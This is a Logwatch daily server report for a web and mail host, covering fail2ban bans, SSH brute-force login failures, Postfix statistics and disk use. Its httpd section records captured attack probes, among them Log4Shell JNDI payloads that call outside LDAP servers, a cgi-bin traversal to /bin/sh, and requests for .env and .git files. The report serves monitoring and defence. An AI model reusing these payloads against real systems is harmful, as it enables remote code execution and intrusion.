################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 24 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-23 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
49.113.101.166 -> zapf.wiki:443: 1 Time(s)
A total of 11 sites probed the server
Requests with error response codes
400 Bad Request
null: 13 Time(s)
/: 5 Time(s)
mstshash=Domain: 4 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/robots.txt: 1 Time(s)
zapf.wiki:443: 1 Time(s)
403 Forbidden
/FrcS3CFURGOhH8IZnOVeEw?both=: 1 Time(s)
499 (undefined)
/: 6 Time(s)
/${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
500 Internal Server Error
/: 44 Time(s)
/.env: 4 Time(s)
/.git/HEAD: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/robots.txt: 2 Time(s)
//login_sid.lua: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (125.87.86.147): 36 Time(s)
root (146.56.205.217): 35 Time(s)
root (213.6.203.226): 33 Time(s)
root (119.29.0.209): 32 Time(s)
root (49.232.221.113): 32 Time(s)
root (180.76.246.21): 26 Time(s)
root (202.111.30.6): 25 Time(s)
unknown (180.76.246.21): 21 Time(s)
unknown (49.232.221.113): 18 Time(s)
unknown (213.6.203.226): 17 Time(s)
root (115.248.153.89): 16 Time(s)
unknown (146.56.205.217): 15 Time(s)
root (121.5.107.215): 14 Time(s)
unknown (125.87.86.147): 14 Time(s)
unknown (202.111.30.6): 12 Time(s)
unknown (119.29.0.209): 11 Time(s)
root (106.75.222.175): 9 Time(s)
root (124.79.246.228): 6 Time(s)
unknown (115.248.153.89): 6 Time(s)
root (125-238-192-103-fibre.sparkbb.co.nz): 4 Time(s)
unknown (106.75.222.175): 4 Time(s)
unknown (121.5.107.215): 4 Time(s)
root (221.213.129.46): 3 Time(s)
root (60.30.98.194): 2 Time(s)
unknown (117.89.142.214): 2 Time(s)
unknown (139.64.23.74): 2 Time(s)
unknown (195.133.18.104): 2 Time(s)
unknown (49.158.25.166): 2 Time(s)
unknown (60.30.98.194): 2 Time(s)
unknown (80.119.132.77.rev.sfr.net): 2 Time(s)
postgres (106.75.222.175): 1 Time(s)
postgres (202.111.30.6): 1 Time(s)
root (103.254.198.67): 1 Time(s)
root (110.77.239.51): 1 Time(s)
root (148.102.25.170): 1 Time(s)
root (201.137.58.193): 1 Time(s)
root (45.88.137.100): 1 Time(s)
unknown (125-238-192-103-fibre.sparkbb.co.nz): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (156.234.168.70): 1 Time(s)
unknown (201.137.58.193): 1 Time(s)
unknown (62.233.50.53): 1 Time(s)
Invalid Users:
Unknown Account: 139 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Miscellaneous warnings
10.191K Bytes accepted 10,436
10.191K Bytes sent via SMTP 10,436
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
231 Connections
131 Connections lost (inbound)
231 Disconnections
1 Removed from queue
1 Sent via SMTP
44 Timeouts (inbound)
1 Illegal address syntax in SMTP command
2 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 1 Time(s)
Failed logins from:
45.88.137.100: 1 time
49.232.221.113: 32 times
60.30.98.194 (no-data): 2 times
103.254.198.67: 1 time
106.75.222.175: 10 times
110.77.239.51: 1 time
115.248.153.89: 16 times
119.29.0.209: 32 times
121.5.107.215: 14 times
124.79.246.228 (228.246.79.124.broad.xw.sh.dynamic.163data.com.cn): 6 times
125.87.86.147: 36 times
125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 4 times
146.56.205.217: 35 times
148.102.25.170: 1 time
180.76.246.21: 26 times
201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time
202.111.30.6: 26 times
213.6.203.226: 33 times
221.213.129.46: 3 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 108 times
49.158.25.166 (49-158-25-166.dynamic.elinx.com.tw): 2 times
49.232.221.113: 18 times
60.30.98.194 (no-data): 2 times
62.233.50.53: 1 time
64.62.197.32: 1 time
77.132.119.80 (80.119.132.77.rev.sfr.net): 2 times
106.75.222.175: 4 times
115.248.153.89: 6 times
117.89.142.214: 2 times
119.29.0.209: 11 times
121.5.107.215: 4 times
125.87.86.147: 14 times
125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 1 time
139.64.23.74: 2 times
146.56.205.217: 15 times
146.185.79.101: 1 time
156.234.168.70: 1 time
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
180.76.246.21: 21 times
195.133.18.104: 2 times
201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time
202.111.30.6: 12 times
213.6.203.226: 17 times
**Unmatched Entries**
Protocol major versions differ for 134.122.134.150: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################